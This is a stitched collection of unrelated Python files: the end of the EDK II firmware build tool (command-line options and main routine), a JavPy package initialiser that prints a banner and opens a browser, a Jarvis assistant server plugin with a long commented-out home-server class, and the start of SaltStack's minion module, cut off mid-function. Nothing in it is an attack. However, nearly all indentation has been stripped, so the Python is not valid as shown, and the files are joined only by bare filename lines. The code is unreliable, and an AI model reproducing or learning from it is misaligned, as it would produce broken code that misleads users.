# Rebase module to the preferred memory address before GenFds
#
MapBuffer = []
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
GenFdsStart = time.time()
if GenFdsApi(Wa.GenFdsCommandDict, self.Db):
EdkLogger.error("build", COMMAND_FAILURE)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
self.GenFdsTime += int(round((time.time() - GenFdsStart)))
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
                    # Build the tool-definition prefix for this target/toolchain/arch
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.items():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
                    # Write out GuidedSectionTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print(' '.join(guidedSectionTool), file=toolsFile)
toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
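    # Illustrative behavior (hypothetical paths): GetFullPathOfTool('LzmaCompress')
    # returns e.g. '/usr/local/bin/LzmaCompress' when the tool is found on PATH,
    # and the literal string 'LzmaCompress' unchanged when it is not found.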
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
all_lib_set = set()
all_mod_set = set()
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
all_mod_set.add(Module)
for Module in self.HashSkipModules:
Module.CreateAsBuiltInf(True)
all_mod_set.add(Module)
for Module in all_mod_set:
for lib in Module.LibraryAutoGenList:
all_lib_set.add(lib)
for lib in all_lib_set:
lib.CreateAsBuiltInf(True)
all_lib_set.clear()
all_mod_set.clear()
self.BuildModules = []
self.HashSkipModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
Utils.Progressor.Abort()
        if self.SpawnMode:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def ParseDefines(DefineList=None):
DefineDict = {}
if DefineList is not None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
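# Illustrative only (not a shipped doctest):
#   ParseDefines(['SECURE_BOOT', 'BUILD_NUMBER=42'])
#   -> {'SECURE_BOOT': 'TRUE', 'BUILD_NUMBER': '42'}
# Names that do not match gMacroNamePattern ([A-Z][A-Z0-9_]*) raise a
# FORMAT_INVALID build error.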
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
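# Illustrative only: with "-p A.dsc -p B.dsc" on the command line, the second
# occurrence reaches this callback after the option is already in gParamCheck,
# so the parser exits with "Option -p/--platform only allows one instance in
# command line!".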
def LogBuildTime(Time):
if Time:
TimeDurStr = ''
TimeDur = time.gmtime(Time)
if TimeDur.tm_yday > 1:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur) + ", %d day(s)" % (TimeDur.tm_yday - 1)
else:
TimeDurStr = time.strftime("%H:%M:%S", TimeDur)
return TimeDurStr
else:
return None
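# Illustrative only: LogBuildTime(3725) returns '01:02:05', LogBuildTime(90061)
# returns '01:01:01, 1 day(s)', and LogBuildTime(0) or LogBuildTime(None)
# returns None.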
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt   An optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__, version=__version__, prog="build.exe", usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32', 'X64', 'EBC', 'ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. When value is set to 0, tool automatically detect number of "\
"processor threads, set value to 1 means disable multi-thread build, and set value to more than 1 means user specify the threads number to build.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD', 'LIBRARY', 'FLASH', 'DEPEX', 'BUILD_FLAGS', 'FIXED_ADDRESS', 'HASH', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, HASH, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, HASH, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
Parser.add_option("--hash", action="store_true", dest="UseHashCache", default=False, help="Enable hash-based caching during build process.")
Parser.add_option("--binary-destination", action="store", type="string", dest="BinCacheDest", help="Generate a cache of binary files in the specified directory.")
Parser.add_option("--binary-source", action="store", type="string", dest="BinCacheSource", help="Consume a cache of binary files from the specified directory.")
Parser.add_option("--genfds-multi-thread", action="store_true", dest="GenfdsMultiThread", default=False, help="Enable GenFds multi thread to generate ffs file.")
Parser.add_option("--disable-include-path-check", action="store_true", dest="DisableIncludePathCheck", default=False, help="Disable the include path check for outside of package.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
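# Illustrative invocation (hypothetical platform and tool chain):
#   build -p MyPkg/MyPkg.dsc -a X64 -t GCC5 -b DEBUG -n 0
# builds the X64 DEBUG configuration of MyPkg.dsc with the GCC5 tool chain,
# auto-detecting the number of build threads.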
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile is not None:
EdkLogger.SetLogFile(Option.LogFile)
    if Option.WarningAsError:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
    EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()))
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile is not None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile is not None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag is not None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError as X:
if MyBuild is not None:
            # let the multi-thread build exit safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning as X:
# error from Fdf parser
if MyBuild is not None:
            # let the multi-thread build exit safely
MyBuild.Relinquish()
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option is not None and Option.debug is not None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild is not None:
            # let the multi-thread build exit safely
            MyBuild.Relinquish()
        # try to get the meta-file from the object causing the exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb is not None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to [email protected] for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild is not None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr, LogBuildTime(MyBuild.AutoGenTime), LogBuildTime(MyBuild.MakeTime), LogBuildTime(MyBuild.GenFdsTime))
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
__init__.py
|
from .app.webserver.app import app
from .app.tgbot.server import run
import os
import time
import threading
import sys
print(r"""
__ ____
/ /___ __ __/ __ \__ __
__ / / __ `/ | / / /_/ / / / /
/ /_/ / /_/ /| |/ / ____/ /_/ /
\____/\__,_/ |___/_/ \__, /
/____/
Awesome! Now try to type
JavPy.serve()
and open http://localhost:8081 to enjoy driving!
If you want to run a telegram bot server, instead, please type
JavPy.serve_tg(token)
But please get a token from BotFather first
More info: https://github.com/theodorekrypton/JavPy
""")
def open_browser(port):
time.sleep(5)
url = "http://localhost:" + str(port)
if "win32" in sys.platform:
os.system("start \"\" \"" + url + "\"")
elif "linux" in sys.platform:
os.system("xdg-open " + url)
else:
os.system("open " + url)
def serve(port=8081):
threading.Thread(target=open_browser, args=(port,)).start()
app.run('0.0.0.0', port, threaded=True)
def serve_tg(token):
run(token)
|
jarvis_server.py
|
from multiprocessing import Process
from plugin import Platform, require, plugin
@require(network=True, platform=Platform.MACOS)
@plugin("server start")
def server_start(jarvis, s):
jarvis_server = jarvis.get_server()
if s != "":
if ":" in s:
jarvis_server.server_host, jarvis_server.port = s.split(":")[0], int(s.split(":")[1])
else:
jarvis_server.server_host, jarvis_server.port = s.split(" ")[0], int(s.split(" ")[1])
jarvis.server_thread = Process(target=jarvis_server.start_server)
jarvis.server_thread.start()
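# Hedged usage sketch, inferred from the parsing above: the plugin accepts
# either "server start 127.0.0.1:8080" or "server start 127.0.0.1 8080";
# with an empty argument the server keeps its current host/port settings.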
@require(network=True, platform=Platform.MACOS)
@plugin("server stop")
def server_stop(jarvis, s):
    if not hasattr(jarvis, "server_thread") or jarvis.server_thread is None:
jarvis.say("No server is running.")
return
# server.stop_server(jarvis)
# print(jarvis.server_thread.isAlive())
jarvis.server_thread.terminate()
jarvis.server_thread.join()
jarvis.server_thread = None
@require(network=True, platform=Platform.MACOS)
@plugin("server restart")
def server_restart(jarvis, s):
server_stop(jarvis, s)
server_start(jarvis, s)
#
#
# @require(network=True)
# @plugin("home server")
# class HomeServer(BaseHTTPRequestHandler):
#
# def __init__(self, request, client_address, server):
# super().__init__(request, client_address, server)
# self.devices = dict()
# self.app_logins = dict()
#
# def do_POST(self):
#         if self.headers["Auth"] != auth:
# self._return_unauthorized()
# else:
# content_len = int(self.headers.get('Content-Length'))
# device_type = self.headers.get('User-Agent')
# post_body = self.rfile.read(content_len)
# print(self.headers.get('Device-Agent') + " found!")
#             if "ESP8266" in device_type:
# self._register_device(self.headers, post_body)
# self._respond(200, '')
# else:
# response_type = self._respond_to_agent(self.headers, post_body)
# if response_type == "Success":
# self._respond(200, response_type)
# elif response_type is not None:
# self._respond(404, response_type)
#
# def _respond(self, code: int, message: str):
# self.send_response(code)
# self.send_header("Auth", auth)
# self.end_headers()
# self.wfile.write(message.encode('utf-8'))
#
# def _register_device(self, headers, body):
# agent = headers["Device-Agent"]
# self.devices[agent] = dict(json.loads(body.decode('utf-8')))
# self.devices[agent]["counter"] = 0
# self.devices[agent]["connected"] = True
# self.devices[agent]["thread"] = Thread(target=self._handle_heartbeat,
# args=(agent,))
# self.devices[agent]["thread"].start()
#
# def _respond_to_agent(self, headers, body):
# agent = headers["Device-Agent"]
# self.app_logins[agent] = dict(json.loads(body.decode('utf-8')))
# self.app_logins[agent]["connected"] = True
# return self._handle_app_request(agent)
#
# def _handle_app_request(self, agent: str):
# app_request_type = self.app_logins[agent]["request_type"]
#
# if app_request_type == 'intro':
# return self._send_intro_to_app()
#
# return self._respond_to_app_request(agent)
#
# def _send_intro_to_app(self):
# app_intro = dict()
# app_intro["devices"] = self.get_connected_devices()
# app_intro["users"] = self.get_connected_users()
# return json.dumps(app_intro)
#
# def _respond_to_app_request(self, agent: str):
# app_request = self.app_logins[agent]["request"]
# device = app_request["device"]
# device_switch = app_request["switch"]
# device_switch_request = device_switch["request"]
# device_switch_value = device_switch["value"]
# if not self.devices[device]["connected"]:
# return "Device disconnected"
# device_url = self.devices[device]["localIP"]
# device_headers = dict({"Auth": auth})
#
# try:
# request = requests.get(device_url + "/" + device_switch_request +
# "/" + device_switch_value, headers=device_headers)
# except requests.exceptions.ConnectionError as ce:
# print("Device Connection Error: " + agent)
# self.devices[agent]["connected"] = False
# return "Device disconnected"
# return "Success"
#
# def _handle_heartbeat(self, agent: str):
# device_url = self.devices[agent]["localIP"]
# while self.devices[agent]["connected"]:
# device_headers = dict({"Auth": auth})
# try:
# request = requests.get(device_url + "/heartbeat",
# headers=device_headers)
# self.devices[agent]["counter"] = 0
# except requests.exceptions.ConnectionError as ce:
# print(ce)
# print("Device Connection Error: " + agent)
# self.devices[agent]["counter"] += 1
# if self.devices[agent]["counter"] >= 3:
# self.devices[agent]["connected"] = False
# time.sleep(5)
#
# def get_connected_devices(self):
# connected_devices = [device for device in self.devices.keys()
# if self.devices[device]["connected"]]
# print(connected_devices)
# return connected_devices
#
# def get_connected_users(self):
# connected_users = [user for user in self.app_logins.keys()
# if self.app_logins[user]["connected"]]
# return connected_users
#
# def _return_unauthorized(self):
# self.send_response(403)
# self.send_header("Status Code", 403)
# self.end_headers()
# self.wfile.write(b'Unauthorized')
#
#
# @require(network=True, platform=MACOS)
# @plugin('home server start')
# def home_server(jarvis, s):
# web_server = HTTPServer((hostName, serverPort), HomeServer)
#     jarvis.say("Server started http://%s:%s" % (hostName, serverPort))
#     web_server.serve_forever()
#
#
# @require(network=True, platform=MACOS)
# @plugin('home server connections')
# def home_server_get_connections(jarvis, s):
# if web_server is None:
# jarvis.say("Unable to find a running server. Did you start a Server ?")
# return
# connections = dict()
# connections["devices"] = web_server.get_connected_devices()
# connections["users"] = web_server.get_connected_users()
# return json.dumps(connections)
#
#
# @require(network=True, platform=MACOS)
# @plugin('home server stop')
# def home_server_stop(jarvis, s):
# if web_server is None:
# jarvis.say("Unable to stop server. Did you start a Server ?")
# return
# web_server.server_close()
# jarvis.say("Server killed!")
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.dictupdate
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
            err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
        else:
            err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
        log.warning('Master IP address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
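# Illustrative sketch of the return value (assumed addresses, not captured
# output): with opts like {'master': 'salt', 'master_port': 4506, ...},
# resolve_dns() yields something like
# {'master_ip': '10.0.0.5', 'master_uri': 'tcp://10.0.0.5:4506'}.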
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
    mode: anything os.makedirs would accept as mode.
    uid: the uid to set; if not set, None, or -1, no changes are
         made. The same applies if the directory is already owned by this
         uid. Must be an int. Works only on unix/unix-like systems.
    gid: the gid to set; if not set, None, or -1, no changes are
         made. The same applies if the directory is already owned by this
         gid. Must be an int. Works only on unix/unix-like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
    # dir mode. So let's check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
